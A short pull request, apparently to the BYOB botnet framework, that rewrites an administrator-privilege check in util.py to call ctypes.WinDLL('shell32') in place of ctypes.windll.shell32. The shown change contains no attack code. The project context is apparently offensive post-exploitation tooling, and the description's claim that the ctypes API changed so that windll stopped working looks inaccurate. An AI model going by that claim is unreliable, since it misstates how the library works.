### PR TITLE
ctypes library updated

### DIFF
--- a/byob/core/util.py
+++ b/byob/core/util.py
@@ -136,7 +136,7 @@ def administrator():
     """
     import os
     import ctypes
-    return bool(ctypes.windll.shell32.IsUserAnAdmin() if os.name == 'nt' else os.getuid() == 0)
+    return bool(ctypes.WinDLL("shell32").IsUserAnAdmin() if 'nt' == os.name else os.getuid() == 0)
 
 
 def geolocation():


### PR DESCRIPTION
The previous call wasn't working because the ctypes API was updated to use a WinDLL() class. i have tested this with Python3.9 and it worked successfully. Ref: https://docs.python.org/3/library/ctypes.html?highlight=ctypes#ctypes.WinDLL